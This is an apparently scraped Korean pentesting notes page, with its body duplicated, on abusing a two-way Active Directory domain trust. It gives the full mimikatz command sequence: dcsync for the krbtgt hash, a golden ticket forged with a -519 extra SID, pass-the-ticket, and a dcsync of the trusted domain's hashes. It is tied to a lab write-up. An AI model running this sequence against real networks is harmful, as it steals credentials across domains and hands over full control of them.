Domain Trust Discovery

도메인에 대한 관리자 권한 획득을 통해 골든 티켓을 획득할 수 있다면

서로 신뢰 관계인 다른 도메인의 NT Hash를 덤핑해서 도메인 측면 이동이 가능합니다.

이것이 가능한 이유는 도메인 간의 신뢰 관계가 양방향성 일 때,

권한이 있다면 다른 도메인의 리소스에 대한 접근 권한이 있기 때문입니다.

타 도메인의 NT Hash 덤핑은 mimikatz에서 사용 가능합니다.

우선 신뢰 관계의 도메인에 대해서 도메인 관리자 권한을 인증하기 위해 골든 티켓을 생성해줍니다.

다음은 전체 명령어에 대한 양식입니다.

:: mimikatz
# krbtgt의 NT Hash 획득
lsadump::dcsync /domain:lab.trusted.vl /all

# 신뢰 관계의 양측 도메인 SID 획득
# 타겟 도메인의 SID 결과값 마지막에 "-519" 추가
lsadump::trust

# Golden-Ticket 생성
kerberos::golden /user:Administrator /krbtgt:<HASH> /domain:<Target Domain> /sid:<SID> /sids:<Target SID>

# 생성된 티켓 등록
kerberos::ptt ticket.kirbi

# 티켓을 통한 타겟 도메인 NT Hash 덤핑
lsadump::dcsync /domain:<Target Domain> /dc:<Target FQDN> /all

References

PreviousWinRM NextCS

Last updated 5 months ago

Was this helpful?

Domain Trust Discovery

도메인에 대한 관리자 권한 획득을 통해 골든 티켓을 획득할 수 있다면

서로 신뢰 관계인 다른 도메인의 NT Hash를 덤핑해서 도메인 측면 이동이 가능합니다.

이것이 가능한 이유는 도메인 간의 신뢰 관계가 양방향성 일 때,

권한이 있다면 다른 도메인의 리소스에 대한 접근 권한이 있기 때문입니다.

타 도메인의 NT Hash 덤핑은 mimikatz에서 사용 가능합니다.

우선 신뢰 관계의 도메인에 대해서 도메인 관리자 권한을 인증하기 위해 골든 티켓을 생성해줍니다.

다음은 전체 명령어에 대한 양식입니다.

:: mimikatz
# krbtgt의 NT Hash 획득
lsadump::dcsync /domain:lab.trusted.vl /all

# 신뢰 관계의 양측 도메인 SID 획득
# 타겟 도메인의 SID 결과값 마지막에 "-519" 추가
lsadump::trust

# Golden-Ticket 생성
kerberos::golden /user:Administrator /krbtgt:<HASH> /domain:<Target Domain> /sid:<SID> /sids:<Target SID>

# 생성된 티켓 등록
kerberos::ptt ticket.kirbi

# 티켓을 통한 타겟 도메인 NT Hash 덤핑
lsadump::dcsync /domain:<Target Domain> /dc:<Target FQDN> /all

References

Microsoft Entra Domain Services에서 트러스트의 작동 방식 - Microsoft Entra IDMicrosoftLearn

Trusted | Vulnlab Write-UpMedium

PreviousWinRM NextCS

Last updated 5 months ago

Was this helpful?